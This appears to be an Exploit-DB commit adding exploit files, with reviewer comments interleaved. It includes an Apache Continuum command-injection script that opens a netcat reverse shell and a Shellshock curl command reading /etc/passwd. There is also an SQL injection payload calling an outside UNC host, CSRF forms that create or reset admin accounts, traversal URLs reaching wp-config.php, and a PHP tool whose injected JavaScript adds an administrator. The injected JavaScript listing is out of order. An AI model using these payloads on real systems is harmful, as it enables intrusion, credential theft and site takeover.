DB: 2016-06-07

16 new exploits

Linux Kernel < 2.6.34 (Ubuntu 11.10 x86 & x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)
Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)

Linux Kernel  2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)
Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)

Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings
Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root

WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities
Dream Gallery 1.0 - CSRF Add Admin Exploit
Apache Continuum 1.4.2 - Multiple Vulnerabilities
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit
Valve Steam 3.42.16.13 - Local Privilege Escalation
ArticleSetup 1.00 - CSRF Change Admin Password
Electroweb Online Examination System 1.0 - SQL Injection
WordPress WP Mobile Detector Plugin 3.5 - Arbitrary File Upload
WordPress Creative Multi-Purpose Theme 9.1.3 - Stored XSS
WordPress WP PRO Advertising System Plugin 4.6.18 - SQL Injection
WordPress Newspaper Theme 6.7.1 - Privilege Escalation
WordPress Uncode Theme 1.3.1 - Arbitrary File Upload
WordPress Double Opt-In for Download Plugin 2.0.9 - SQL Injection
Notilus Travel Solution Software 2012 R3 - SQL Injection
rConfig 3.1.1 - Local File Inclusion
Nagios XI 5.2.7 - Multiple Vulnerabilities
Offensive Security 2016-06-07 05:07:41 +00:00
parent 2808c59ead
commit 62962d90b0
18 changed files with 1402 additions and 3 deletions


@ -13819,7 +13819,7 @@ id,file,description,date,author,platform,type,port
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 11.10 x86 & x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0
16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0
15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
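Review bot: while touching the 15944 row, the adjacent context line for 15945 still carries the misspelling "Vulnerbility" (should be "Vulnerability"); since this commit is already normalising titles in this region ("x86 & x64" to "x86/x64"), fix that entry in the same pass rather than leaving a second cosmetic commit for later.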
@ -35511,7 +35511,7 @@ id,file,description,date,author,platform,type,port
39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21
39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings",2016-01-19,"Perception Point Team",linux,local,0
39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root",2016-01-19,"Perception Point Team",linux,local,0
39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0
39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
@ -35998,6 +35998,7 @@ id,file,description,date,author,platform,type,port
39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0
39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0
39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0
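Review bot: the new 39883 row is inserted out of ID order, between 39809 and 39810, while the rest of this commit appends the 39884 to 39899 rows after 39882. Move the 39883 line into the later hunk so it sits between 39882 and 39884; files.csv is otherwise kept in ascending ID order and tools that bisect or diff the file by ID assume that.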
@ -36063,3 +36064,18 @@ id,file,description,date,author,platform,type,port
39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Stored XSS",2016-06-02,"Fernando Câmara",jsp,webapps,0
39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706_ 1.5.1_ 1.5.3 - Unauthenticated File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0
39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - CSRF Add Admin Exploit",2016-06-06,"Ali Ghanbari",php,webapps,80
39886,platforms/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps,0
39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit",2016-06-06,lastc0de,cgi,webapps,80
39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,gsX,windows,local,0
39889,platforms/php/webapps/39889.html,"ArticleSetup 1.00 - CSRF Change Admin Password",2016-06-06,"Ali Ghanbari",php,webapps,80
39890,platforms/php/webapps/39890.txt,"Electroweb Online Examination System 1.0 - SQL Injection",2016-06-06,"Ali Ghanbari",php,webapps,80
39891,platforms/php/webapps/39891.txt,"WordPress WP Mobile Detector Plugin 3.5 - Arbitrary File Upload",2016-06-06,"Aaditya Purani",php,webapps,80
39892,platforms/php/webapps/39892.php,"WordPress Creative Multi-Purpose Theme 9.1.3 - Stored XSS",2016-06-06,wp0Day.com,php,webapps,80
39893,platforms/php/webapps/39893.php,"WordPress WP PRO Advertising System Plugin 4.6.18 - SQL Injection",2016-06-06,wp0Day.com,php,webapps,80
39894,platforms/php/webapps/39894.php,"WordPress Newspaper Theme 6.7.1 - Privilege Escalation",2016-06-06,wp0Day.com,php,webapps,80
39895,platforms/php/webapps/39895.php,"WordPress Uncode Theme 1.3.1 - Arbitrary File Upload",2016-06-06,wp0Day.com,php,webapps,80
39896,platforms/php/webapps/39896.txt,"WordPress Double Opt-In for Download Plugin 2.0.9 - SQL Injection",2016-06-06,"Kacper Szurek",php,webapps,80
39897,platforms/asp/webapps/39897.txt,"Notilus Travel Solution Software 2012 R3 - SQL Injection",2016-06-06,"Alex Haynes",asp,webapps,80
39898,platforms/php/webapps/39898.txt,"rConfig 3.1.1 - Local File Inclusion",2016-06-06,"Gregory Pickett",php,webapps,80
39899,platforms/php/webapps/39899.txt,"Nagios XI 5.2.7 - Multiple Vulnerabilities",2016-06-06,Security-Assessment.com,php,webapps,80
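Review bot: the port column for 39886 (Apache Continuum) is 0, but the advisory added in this same commit targets the service on 8080 (its dork is "inurl::8080/continuum/" and the PoC posts to http://$1:$2/continuum/ with 8080 in the examples); set the port to 8080 so the CSV matches the exploit. The row count is consistent with the commit message (15 rows here plus 39883 in the earlier hunk gives the stated 16 new exploits), and ID 39885 is simply skipped, which is worth a word in the commit message if that is intentional.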

platforms/asp/webapps/39897.txt Executable file

@ -0,0 +1,64 @@
Exploit Title: Notilus SQL injection
Product: Notilus travel solution software
Vulnerable Versions: 2012 R3
Tested Version: 2012 R3
Advisory Publication: 03/06/2016
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]
CVE Reference: NONE
Credit: Alex Haynes
Advisory Details:
(1) Vendor & Product Description
--------------------------------
Vendor: DIMO Software
Product & Version:
Notilus travel solution software v2012 R3
Vendor URL & Download:
http://www.notilus.com/
Product Description:
"DIMO Software is the European leader on the Travel and Expense Management market. We publish the Notilus solution, a simple efficient software to manage the entire business travel process: travel orders, online and offline booking, expense reports, supplier invoices, car fleet, mobile telephones, etc."
(2) Vulnerability Details:
--------------------------
The Notilus software is vulnerable to SQL injection attacks, specifically in the password modification fields.
Proof of concept:
POST TO /company/profilv4/Password.aspx
Vulnerable parameter: H_OLD
Payload:
ACTION=1&H_OLD=mypass'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\testdomain.mydo'%2b'main.com\vps'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&H_NEW1=%27+or+%27%27%3D%27&H_NEW2=%27+or+%27%27%3D%27
(3) Advisory Timeline:
----------------------
15/02/16 - First Contact: vendor requests details of vulnerability
03/03/16 - Follow up to vendor to inquire about availability of a fix.
03/03/16 - vendor responds that fix will be available 16/03/16.
16/03/16 - Vendor releases patch.
(4)Solution:
------------
Patch to latest available 2012 R3 branch or upgrade to version 2016.
(5) Credits:
------------
Discovered by Alex Haynes
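Review bot: the "(4)Solution:" header is missing the space the other numbered headers have, and the timeline uses DD/MM/YY while "Advisory Publication" uses DD/MM/YYYY; normalise both. More substantively, the PoC payload calls master.dbo.xp_dirtree with a UNC path, which only works because the application's database login holds the rights to run that extended procedure, so the Solution section should recommend, alongside the vendor patch, running the application under a least-privilege SQL Server login and moving the password-change query to parameterised statements, since those are the controls a defender can verify independently of the 2012 R3 / 2016 upgrade. "CVE Reference: NONE" should be revisited once the vendor patch is public.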

platforms/cgi/webapps/39887.txt Executable file

@ -0,0 +1,17 @@
# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop
# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client
# Date: 6/4/2016
# Exploit Author: lastc0de@outlook.com
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html
# Version: 4.61.915
# Tested on: Linux
VULNERABLE FILE
http://target.com//tarantella/cgi-bin/modules.cgi
POC :
localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt
localhost@~#cat xixixi.txt
which will print out the content of /etc/passwd file.
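Review bot: the VULNERABLE FILE line has a doubled slash ("target.com//tarantella/...") that the curl line below does not, and "Date: 6/4/2016" is ambiguous between 6 April and 4 June (the commit date suggests the latter); write the date unambiguously and use one URL form. The header also has no CVE reference and no remediation line: this is the Shellshock bash bug reached through a CGI script, so the fix is the vendor's patched bash packages, and the advisory should say so and note that the CGI script itself is not the defect.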


@ -0,0 +1,48 @@
# Exploit Title: Unauthenticated command injection - Apache Continuum
# Google Dork: inurl::8080/continuum/
# Date: 04/06/2016
# Exploit Author: David Shanahan (@cyberpunksec)
# Contact: http://www.procheckup.com/
# Vendor Homepage: https://continuum.apache.org/
# Software Link: https://continuum.apache.org/download.cgi
# Version: 1.4.2
# Tested on: Debian
--- Description ---
Apache Continuum is a continuous integration server for building Java projects https://continuum.apache.org/
ProCheckUp has discovered that Apache Continuum is vulnerable to an unauthenticated command injection attack and reflected XSS.
1) Command injection
Vulnerable URL - http://127.0.0.1:8080/continuum/saveInstallation.action
Vulnerable Parameter - installation.varValue
#!/bin/sh
if [ $# -eq 0 ]
then
echo "$0 <rhost> <rport> <lhost> <lport>"
echo "Remember to set up your netcat listener"
exit 1
fi
cmd="\`nc $3 $4 -e /bin/sh\`"
echo "\n\t[ Apache Continuum <= v1.4.2 CMD Injection ]"
echo "\t\t[ Procheckup - David Shanahan ]\n"
curl http://$1:$2/continuum/saveInstallation.action --data "installation.name=blah&installation.type=jdk&installation.varValue=$cmd"
2) Reflected XSS
The cross site scripting attack works against authenticated users only. An example attack would be to send an authenticated user (let's say the admin) the malicious URL.
If the victim is logged in and accesses the URL, the attacker could steal the victim's session cookie and impersonate them.
Vulnerable URL - http://127.0.0.1:8080/continuum/security/useredit_confirmAdminPassword.action?userAdminPassword=&username=guest&user.username=guest<script>alert(document.cookie)</script>&user.fullName=Guest&user.email=blah@procheckup.com&user.password=password&user.confirmPassword=password&user.timestampAccountCreation=&user.timestampLastLogin=&user.timestampLastPasswordChange=&user.locked=false&user.passwordChangeRequired=false&method:confirmAdminPassword=Submit&cancel=Cancel<http://127.0.0.1:8080/continuum/security/useredit_confirmAdminPassword.action?userAdminPassword=&username=guest&user.username=guest%3cscript%3ealert(document.cookie)%3c/script%3e&user.fullName=Guest&user.email=blah@procheckup.com&user.password=password&user.confirmPassword=password&user.timestampAccountCreation=&user.timestampLastLogin=&user.timestampLastPasswordChange=&user.locked=false&user.passwordChangeRequired=false&method:confirmAdminPassword=Submit&cancel=Cancel>
Fix:
The Apache Continuum project is no longer maintained. Removal of the software is recommended.
http://www.procheckup.com/
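Review bot: the Reflected XSS "Vulnerable URL" line contains the same URL twice, once raw and once percent-encoded inside angle brackets, which looks like a mail client's link-rendering artefact pasted into the advisory; keep a single form. In the shell PoC, the escape sequences in the two echo lines ("\n\t...") only render on shells whose echo interprets them (dash on Debian does, bash by default does not), so printf would be the portable choice for a script with a #!/bin/sh shebang. The header should also carry a CVE reference or state that none was assigned, and since the Fix section's only advice is removal, it would help defenders to add that the command injection is unauthenticated on the saveInstallation.action endpoint so they can block that path at a proxy while decommissioning.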


@ -1,7 +1,9 @@
/*
# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings
# Date: 19/1/2016
# Exploit Author: Perception Point Team
# CVE : CVE-2016-0728
*/
/* CVE-2016-0728 local root exploit
modified by Federico Bento to read kernel symbols from /proc/kallsyms
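Review bot: the modification credit is added as a second comment block immediately after the existing header instead of as a "Modified by" line inside it, so the Date and Author fields no longer describe the file as committed; merge the credit into the header and record the modification date. The new comment also states that the exploit now reads kernel symbols from /proc/kallsyms, and the header should document that this only works when kernel.kptr_restrict is 0: with the value 1 or 2, unprivileged readers see zeroed addresses, which is the mitigation a defender will want to know about when assessing this file.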

platforms/php/webapps/39883.txt Executable file

@ -0,0 +1,90 @@
####################
# Meta information #
####################
# Exploit Title: Wordpress plugin simple-backup - Multiple vulnerabilities
# Date: 2016-06-02
# Exploit Author: PizzaHatHacker [A] gmail [.] com
# Vendor Homepage: [DEAD LINK] https://wordpress.org/plugins/simple-backup/
# Software Link: [DEAD LINK] https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.11
# Tested on: simple-backup 2.7.11 & Wordpress 4.4.2
#
# History :
# 2016-02-21 Contact requested on the vendor website via "Contact Us"
# 2016-02-24 Contact requested on the vendor website via "Support"
# 2016-03-09 Email to plugins@wordpress.org
# 2016-03-10 Acknowledged by Wordpress team
# 2016-06-02 No information, no response, vulnerabilities not fixed,
# disclosure of this document.
#
##################################
### 1. Arbitrary File Deletion ###
##################################
It is possible to remotely delete arbitrary files on the webserver on wordpress
blogs that have simple-backup plugin installed and enabled. No authentication
is required, the default configuration of simple-backup is affected.
Example 1 : Delete "pizza.txt" in wordpress root :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=../pizza.txt
Example 2 : Delete .htaccess file protecting the backup folder :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=.htaccess&download_backup_file=inexisting
Note : When 'download_backup_file' parameter is provided with an invalid
filepath, the PHP script exits prematurely with message "Access Denied!" and so
does not regenerate automaticaly the .htaccess file.
After this request, it may be possible (depending on the web server
configuration) to browse the backup directory and download server backup files
at this URL :
http://127.0.0.1/<WP-path>/simple-backup/
The backup archive files may contain all the wordpress files : configuration
files (wp-config.php etc.), PHP source code (plugins, etc.), and a database
dump (all tables content, wordpress users passwords etc.).
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Base Score : 7.5
Impact Subscore : 6.4
Exploitability Subscore : 10
########################
### 2. File Download ###
########################
It is possible to download remote files from the webserver on wordpress blogs
that have simple-backup plugin installed and enabled. No authentication is
required, the default configuration of simple-backup is affected.
Example 1 : Download tools.php source file :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=
Example 2 : Download a backup file :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=backup-2016-02-21-111047.tar
(If backups are performed automatically at predefined times, it is easy to
find the backup file name, as it is based on the current time).
Moreover, the checks performed on user-provided 'filename' parameter are
insufficient :
simple-backup-manager.php:function download_local_backup_file($filename){
$filename = ltrim($filename, ".\/");
* Only logged-in AND authorized users (with permissions to manage backups)
should be allowed to download files
* The file name should match a backup file and must not be empty
* The input is not correctly checked for directory traversal (use PHP
'basename' instead of 'ltrim')
For example in the special case where a folder 'oldBackups' is created inside
the backup directory, it would be possible to download ANY file on the web
server via direct requests to this kind of URLs :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../wp-config.php
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../../../../../etc/passwd
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CVSS Base Score : 5
Impact Subscore : 2.9
Exploitability Subscore : 10
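Review bot: the source excerpt in section 2 stops after the ltrim line, so the reader cannot see the code that serves the file or confirm the absence of the permission check that the first bullet describes; include the surrounding lines of download_local_backup_file so each of the three bullets can be checked against the code. The bullets themselves read as a fix list and would be stronger as one: require a capability check (for example current_user_can on the capability that governs backups) before any file access, reduce the name with basename, and then compare realpath of the resulting path against the backup directory, since basename alone would still not reject an empty name, which is the case Example 1 in section 2 exploits. Typos on the hunk lines: "automaticaly" and "inexisting" (nonexistent).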


@ -0,0 +1,29 @@
<!--
# Exploit Title: Dream Gallery - CSRF Add Admin Exploit
# Google Dork: "Design by Rafael Clares"
# Date: 2016/06/03
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://phpstaff.com.br/
# Version: 1.0
#Exploit:
-->
<html>
<body>
<form method="post" action="http://localhost/{PACH}/admin/usuario.php?action=incluir">
<input type="hidden" name="user_login" value="ali">
<input type="hidden" name="user_password" type="hidden" value="123456" >
<input type="hidden" name="user_email" value="">
<input type="submit" value="create">
</form>
</body>
</html>
<!--
#########################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
-->
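Review bot: the user_password input repeats the type attribute ("type="hidden" ... type="hidden""), which is invalid HTML even if browsers tolerate it, and the placeholder {PACH} in the form action should be {PATH} to match the other advisories in this commit. The header has no Software Link and no fix section; for a CSRF issue the write-up should at least name the missing control (a per-request anti-CSRF token validated by admin/usuario.php, with SameSite cookies as defence in depth) so that anyone verifying a fix knows what to look for.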


@ -0,0 +1,37 @@
<!--
# Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password
# Google Dork : inurl:/article.php?id= intext:Powered By Article Marketing
# Date: 2016/06/04
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://articlesetup.com/
# Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Version: 1.00
#Desc:
When admin click on malicious link , attacker can login as a new
Administrator
with the credentials detailed below.
#Exploit:
-->
<html>
<body>
<form method="post" action="
http://localhost/{PACH}/admin/adminsettings.php">
<input type="hidden" name="update" value="1">
<input type="hidden" name="pass1" type="hidden" value="12345678" >
<input type="hidden" name="pass2" type="hidden" value="12345678" >
<input type="submit" value="create">
</form>
</body>
</html>
<!--
####################################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
-->
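Review bot: the description and the PoC do not agree: the text says the attacker "can login as a new Administrator", but the form posts pass1/pass2 to adminsettings.php, which changes the existing administrator's password rather than creating an account; reword the description to say what the form does. The action attribute is split across two lines, so the URL begins with a newline and leading whitespace inside the quotes (browsers strip it, but it is fragile); keep the URL on one line. As in the Dream Gallery file, the pass1 and pass2 inputs repeat the type attribute and the {PACH} placeholder should be {PATH}. A fix section naming the missing anti-CSRF token would round out the advisory.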

platforms/php/webapps/39890.txt Executable file

@ -0,0 +1,22 @@
# Exploit Title: Online examination system 1.0 - SQL Injection
# Google Dork: inurl:showtest.php?subid=
# Date: 2016/06/05
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://www.onlinefreeprojectdownload.com
# Sofware Link :
http://www.onlinefreeprojectdownload.com/download.php?name=projects/php%20projects/Online_exam.zip
# Version: 1.0
#Exploit:
http://localhost/{PATH}/showtest.php?subid=[SQL Injection]
#Admin Panel:
http://localhost/{PATH}/admin
####################################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
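Review bot: the advisory gives no evidence of the injection beyond the placeholder "[SQL Injection]" on the subid parameter: state the injection type (error-based, boolean, union), the database observed, and what response distinguishes a vulnerable install, otherwise neither a maintainer nor a defender can confirm the finding. Minor points on the same lines: "Sofware" should be "Software", the Software Link URL is wrapped onto a line without the "#" prefix used by the rest of the header, and the "Admin Panel" line belongs in a description rather than as a bare URL.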

platforms/php/webapps/39891.txt Executable file

@ -0,0 +1,34 @@
#Exploit Title: WP Mobile Detector <=3.5 Arbitrary File upload
#Google Dork: inurl: /wp-includes/plugins/wp-mobile-detector
#Date: 1-06-2015
#Exploit Author: Aaditya Purani
#Author Details: https://aadityapurani.com
#Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog
#Version: 3.5
#Tested on: Kali Linux 2.0 Sana / Windows 10
This Vulnerable has been disclosed to public yesterday about WP Mobile
Detector Arbitrary File upload for version <=3.5 in which attacker can
upload malicious PHP Files (Shell) into the Website. Over 10,000 users are
affected, Vendor has released a Patch in their version 3.6 & 3.7 at
https://wordpress.org/plugins/wp-mobile-detector/changelog/ .
I have wrote a Complete POC post:
https://aadityapurani.com/2016/06/03/mobile-detector-poc/
I have made a POC Video Here:
https://www.youtube.com/watch?v=ULE1AVWfHTU
Simple POC:
Go to:
[wordpress sitempath].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]
and it will get saved in directory:
/wp-content/plugins/wp-mobile-detector/cache/shell.php
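Review bot: the header date "1-06-2015" is off by a year; the text refers to the vendor's 3.6/3.7 patch and links a PoC post dated 2016/06/03, so the date should be in 2016 and written unambiguously. The Google Dork points at /wp-includes/plugins/wp-mobile-detector, but the plugin lives under /wp-content/plugins/ as the PoC's own paths show. Grammar on the hunk lines: "This Vulnerable has been disclosed" should be "This vulnerability was disclosed", and "I have wrote" should be "I have written". A defender-facing line stating that the fix is to update to 3.6 or later and that the cache directory should not be served as executable PHP would make the remediation explicit.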

platforms/php/webapps/39892.php Executable file

@ -0,0 +1,198 @@
<?php
/**
* Exploit Titie: Bridge - Creative Multi-Purpose WordPress Theme Exploit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://bridge.qodeinteractive.com/
* Software Link: http://themeforest.net/item/bridge-creative-multipurpose-wordpress-theme/7315054
* Version: 9.1.3
* Tested on: Debian 8, PHP 5.6.17-3
* Type: Stored XSS, Ability to overwrite any theme settings.
* Time line: Found [23-Apr-2016], Vendor notified [23-Apr-2016], Vendor fixed: [Yes], [RD:1]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:u:p:f:c:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function logIn(){
global $curl, $options;
file_put_contents('cookies.txt',"\n");
$curl->setCookieFile('cookies.txt');
$curl->get($options['t']);
$data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
$curl->post($options['t'].'/wp-login.php', $data);
$status = $curl->getTransferInfo('http_code');
if ($status !== 302){
echo "Login probably failed, aborting...\n";
echo "Login response saved to login.html.\n";
die();
}
file_put_contents('login.html',$curl->getResponse());
}
function exploit(){
global $curl, $options;
switch ($options['m']){
case 'm' :
//Maintanence mode
echo "Putting site in maintenece mode\n";
$data = array('action' => 'qodef_save_options', 'qode_maintenance_mode'=>'yes');
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Response: ".$resp."\n";
break;
case 'x' :
//XSS Mode, create extra admin
echo "Injecting inject.js \n";
$data = array('action' => 'qodef_save_options', 'custom_js'=>file_get_contents(dirname(__FILE__)."/inject.js"));
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Response: ".$resp."\n";
break;
}
}
logIn();
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if ( !isset($options['u']) ){
return false;
}
if ( !isset($options['p']) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
if (!isset($options['m']) || !in_array($options['m'], array('m','x') ) ){
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Bridge Theme Exploit, Stored XSS, Create Admin account.
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m [MODE]
*** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
[TARGET_URL] http://localhost/wordpress/
[MODE] x - Permanent XSS DEMO, m - Maintenance Mode
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m x
php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m m
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
?>
inject.js
});
//Get Token
var domain = location.protocol+'//'+document.domain;
var url = domain+'/wp-admin/user-new.php';
var JQ = jQuery.noConflict();
JQ.ajax({
"url": url,
"success" : function(x){
//Got the response
console.log('Got response');
var re = /name="_wpnonce_create-user"(\s+)value="([^"]+)"/g;
var m = re.exec(x);
if (m[2].match(/([a-z0-9]{10})/)) {
var nonce = m[2];
console.log('Got nonce '+nonce);
}
console.log('Registering, User: wp0day_poc, Pass: secret, Role: Admin ');
JQ.ajax({
"url": url,
"method" : "POST",
"data" :
{ "action":"createuser",
"_wpnonce_create-user": nonce,
"_wp_http_referer" : "/wp-admin/user-new.php",
"user_login": "wp0day_poc",
"email" : "contact@wp0day.com",
"first_name" : "Exploit",
"last_name" : "Poc",
"url" : "http://wp0day.com/",
"pass1" : "secret",
"pass1-text" : "secret",
"pass2" : "secret",
"send_user_notification" : 0,
"role":"administrator",
"createuser" : "Add+New+User"
},
"success" : function(x){
console.log("Register done");
}
});
}
});
$j(document).ready(function(){
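Review bot: the inject.js listing appended after the closing "?>" is out of order: its first line is "});" and its last line is "$j(document).ready(function(){", i.e. the opening and closing lines of the listing have been transposed, and "$j" is never defined anywhere in the file (the script assigns "JQ = jQuery.noConflict()"); present the listing in a separate file or at least in the right order so the PoC is readable. The header says "Vendor fixed: [Yes]" without a fixed version, which is the one fact a site owner needs; add it. The "Type" line names stored XSS and "ability to overwrite any theme settings", but the write-up never states the root cause the PoC relies on, namely that the qodef_save_options admin-ajax action accepts option writes from any logged-in user without a capability or nonce check; say so explicitly so the fix can be verified. Also "Exploit Titie" should be "Exploit Title".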

platforms/php/webapps/39893.php Executable file

@ -0,0 +1,177 @@
<?php
/**
